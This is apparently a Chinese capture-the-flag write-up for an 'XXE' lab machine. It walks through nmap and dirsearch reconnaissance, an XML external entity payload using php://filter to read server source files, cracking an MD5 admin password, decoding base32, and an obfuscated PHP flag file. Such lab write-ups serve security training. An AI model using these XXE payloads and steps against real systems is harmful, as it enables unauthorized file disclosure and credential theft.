首先看到一个登录界面
使用nmap工具对网段进行扫描,获取到xxe平台的IP和端口开放情况,可以判断出该平台IP为192.168.79.155
看到开放了80端口,尝试访问
既然看到是个web网站,接下来应该干什么?
dirsearch -u http://192.168.79.155
发现有robtos文件
访问192.168.79.155/robots.txt,再次发现两个敏感文件,依次访问
xxe文件可以访问,但是admin.php文件访问失败,但是文件存在,这个就说不通了,我们先对xxe页面进行渗透看看(现在我们只能看到xxe登录界面,但是看不到通信过程应该怎么办???)
访问xxe页面后,随便输入账号,密码后进行抓包
发现是xml格式
在原有基础上,添加XML声明,DTD声明,并通过xxe变量引用。
接下来探测到有回显又应该怎么办?
尝试读取xxe.php文件
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY f SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php">
]>
<root><name>&f;</name><password>hj</password></root>
刚刚是加密读取的,现在用解码来查看,然后点击派发给Decoder,进行解码
想到robots.txt文件中有一个admin.php文件,尝试读取一下他的内容
重复上述步骤进行解码
密码是MD5加密,尝试一下解密
administhebest/admin@123,尝试登录一下
发现没办法登录,这是怎么回事儿?这是因为我们获取的是xxe目录下的admin.php,所以应该在这个目录下登录
结果发现空欢喜一场,没办法访问flag文件,接下来的思路又该怎们办?
在线工具进行解密
可以看到the flag in (JQZFMMCZPE4HKWTNPBUFU6JVO5QUQQJ5),这串代码也是进行了加密,我们再进行解密,他的加密方式是base32 (一般MD5加密是32位,base64加密末尾都有等于号,没有等于号的可能是base32加密,严格意义上说是编码),将其解码看一下
出现了一个flag的路径,读取一下/etc/.flag.php
$_[]++;$_[]=$_._;$_____=$_[(++$__[])][(++$__[])+(++$__[])+(++$__[])];$_=$_[$_[+_]];$___=$__=$_[++$__[]];$____=$_=$_[+_];$_++;$_++;$_++;$_=$____.++$___.$___.++$_.$__.++$___;$__=$_;$_=$_____;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$_++;$___=+_;$___.=$__;$___=++$_^$___[+_];$À=+_;$Á=$Â=$Ã=$Ä=$Æ=$È=$É=$Ê=$Ë=++$Á[];$Â++;$Ã++;$Ã++;$Ä++;$Ä++;$Ä++;$Æ++;$Æ++;$Æ++;$Æ++;$È++;$È++;$È++;$È++;$È++;$É++;$É++;$É++;$É++;$É++;$É++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ê++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$Ë++;$__('$_="'.$___.$Á.$Â.$Ã.$___.$Á.$À.$Á.$___.$Á.$À.$È.$___.$Á.$À.$Ã.$___.$Á.$Â.$Ã.$___.$Á.$Â.$À.$___.$Á.$É.$Ã.$___.$Á.$É.$À.$___.$Á.$É.$À.$___.$Á.$Ä.$Æ.$___.$Á.$Ã.$É.$___.$Á.$Æ.$Á.$___.$Á.$È.$Ã.$___.$Á.$Ã.$É.$___.$Á.$È.$Ã.$___.$Á.$Æ.$É.$___.$Á.$Ã.$É.$___.$Á.$Ä.$Æ.$___.$Á.$Ä.$Á.$___.$Á.$È.$Ã.$___.$Á.$É.$Á.$___.$Á.$É.$Æ.'"');$__($_);
678
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
